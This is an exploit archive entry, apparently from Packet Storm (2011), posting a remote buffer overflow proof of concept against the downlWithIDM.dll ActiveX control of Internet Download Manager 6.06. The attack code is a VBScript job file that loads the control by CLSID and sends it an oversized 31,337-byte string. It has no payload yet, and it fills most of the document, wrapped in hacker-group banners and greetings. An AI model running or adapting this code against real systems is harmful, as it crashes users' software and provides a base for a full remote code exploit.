Lucene search

K
packetstormKedAns-DzPACKETSTORM:102730
HistoryJul 02, 2011 - 12:00 a.m.

I.D. Manager 6.06 Build 8 Buffer Overflow

2011-07-0200:00:00
KedAns-Dz
packetstormsecurity.com
33
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
<!--  
###  
# Title : I.D.Manager 6.06 Build 8 (downlWithIDM.dll) Remote BOF Exploit  
# Author : KedAns-Dz  
# E-mail : [email protected] ([email protected]) | [email protected]  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com  
# Twitter page : twitter.com/kedans  
# platform : windows < With IE 7.0 >  
# Impact : Remote Buffer Overflow & DLL Hijacked  
##  
# <3 Liyan Oz + All UE-Team & I.BackTrack Team <3  
###  
-->  
  
<?XML version='1.0' standalone='yes' ?>  
<package>  
<job id='DoneInVBS' debug='false' error='true'>  
<object classid='clsid:7D11E719-FF90-479C-B0D7-96EB43EE55D7' id='target' />  
<script language='vbscript'>  
  
'Wscript.echo typename(target)  
  
targetFile = "C:\Program Files\Internet Download Manager\downlWithIDM.dll"  
prototype = "Sub down ( ByVal sourceName As String , ByVal destName As String , ByVal bFailIfExists As Long )"  
memberName = "down"  
progid = "IDownlWithIDM.IDMDwnlMgr.1"  
argCount = 3  
  
rop=""  
buf=String(31337, "A") ' Buffer Overflow  
  
target.down buf ,rop ' Bo0M !  
  
</script>  
</job>  
</package>  
  
  
<!--  
#================[ Exploited By KedAns-Dz * Inj3ct0r * ]=========================================   
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > ++ Liyan Oz & Blackrootkit ..all  
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)   
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu  
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)  
# Jago-Dz (sec4ever.com) * Kalashinkov3 * PaCketStorm Team (www.packetstormsecurity.org)  
# www.metasploit.com * Underground Exploitation (www.dis9.com) * All Security and Exploits Webs ...  
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-  
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever   
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm  
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz  
#================================================================================================  
-->  
`